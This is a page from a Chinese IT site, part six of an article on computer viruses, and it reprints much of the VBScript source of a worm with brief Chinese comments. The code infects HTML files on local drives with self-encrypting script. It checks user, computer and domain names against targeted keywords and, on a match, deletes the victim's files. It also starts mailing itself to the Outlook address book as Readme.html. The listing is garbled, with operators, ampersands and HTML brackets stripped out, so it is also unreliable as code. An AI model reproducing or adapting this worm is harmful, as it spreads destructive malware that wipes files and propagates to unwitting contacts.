锐客网

  1. 首页 > 睿知 > it技术 > >

c语言病毒函数 c语言病毒感染检测( 六 )

IT技术文件


if x.DrivesType = 2 or x.DrivesType = 3 then
call SearchHTML(x"\")
end if
next
if TestUser then Killhe
end sub
sub Gf() '得到系统路径
w1=fso.GetSpecialFolder(0)"\"
w2=fso.GetSpecialFolder(1)"\"
end sub
function Readreg(key_str) '读注册表
set tmps = CreateObject("WScript.Shell")
Readreg = tmps.RegRead(key_str)
set tmps = Nothing
end function
function Writereg(key_str, Newvalue, vtype) '写注册表
set tmps = CreateObject("WScript.Shell")
if vtype="" then
tmps.RegWrite key_str, Newvalue
else
tmps.RegWrite key_str, Newvalue, vtype
end if
set tmps = Nothing
end function
function MakeHtml(Sbuffer, iHTML) '创建HTML 文件的完整代码
dim ra
Randomize
ra = int(rnd() * 7)
MakeHtml="""HTML""HEAD""TITLE"title(ra)"/""TITLE""/HEAD"_
【c语言病毒函数 c语言病毒感染检测】"BO""AD"vbcrlfMakeScript(Sbuffer, iHTML)vbcrlf_
"""/BOAD""/HTML"
end Function
function MakeScript(Codestr, iHTML) '此程序是病毒进行自我加密过程,较为复杂,不再描述
if iHTML then
dim DocuWrite
DocuWrite = "document.write(''+""'SCRIPT Language=JavaScript\n'+"_
"jword""+'\n/'""+'SCRIPT');"
DocuWrite = DocuWritevbcrlf"document.write(''+""'SCRIPT Language=VBScript\n'+"_
"nword""+'\n/'""+'SCRIPT');"
MakeScript="""SCRIPT Language=JavaScript"vbcrlf"var jword = "_
chr(34)encrypt(Js_Str)chr(34)vbcrlf"var nword = "_
chr(34)Codestrchr(34)vbcrlf"nword = unescape(nword);"vbcrlf_
"jword = unescape(jword);"vbcrlfDocuWritevbcrlf"/""SCRIPT"
else
MakeScript= """SCRIPT Language=JavaScript"Codestr"/""SCRIPT"
end if
end function
function GetScriptCode(Languages) ' 得到不同脚本语言的代码
dim soj
for each soj in document.scripts
if LCase(soj.Language) = Languages then
if Languages = "javascript" then
if len(soj.Text) 200 then
else
GetScriptCode = soj.Text
exit function
end if
else
GetScriptCode = soj.Text
exit function
end if
end if
next
end function
function GetJavaScript()
GetJavaScript = GetScriptCode("javascript")
end function
function TestUser() '检测用户过程
on error resume next
dim keys(6), i, tmpStr, Wnet
'特定用户关键词
keys(0) = "white home"
keys(1) = "central intelligence agency"
keys(2) = "bush"
keys(3) = "american stock exchang"
keys(4) = "chief executive"
keys(5) = "usa"
TestUser = false
Set Wnet = CreateObject("WScript.Network") '创建网络对象
'下面一共3个循环,作用一样,是检查用户的 Domain、用户名和计算机名是否含有以上的5个关键词语,一旦含有程序将返回”真”的条件 , 从而对这些用户的文件进行疯狂删除 。
tmpStr = LCase(Wnet.UserName) '
for i=0 to 4
if InStr(tmpStr, keys(i))0 then
TestUser=true
exit function
end if
next
tmpStr = LCase(Wnet.ComputerName)
for i=0 to 4
if InStr(tmpStr, keys(i))0 then
TestUser=true
exit function
end if
next
tmpStr = LCase(Wnet.UserDomain)
for i=0 to 4
if InStr(tmpStr, keys(i)) 0 then
TestUser=true
exit function
end if
next
Set Wnet = Nothing
end function
function SendMail() '发送文件过程
on error resume next
dim wab,ra,j, Oa, arrsm, eins, Eaec, fm, wreg, areg,at
'首先向 OutLook 地址簿发送带能直接感染文件的已加密的病毒代码和HTML 附件
主题是随机的 , 此过程与“欢乐时光“类似 , 所以不再描述
Randomize
at=fso.GetSpecialFolder(1)"\Readme.html"

推荐阅读


上一篇:SAP可视化,sap可视化工具

下一篇:开发养龙游戏,养龙游戏叫什么名字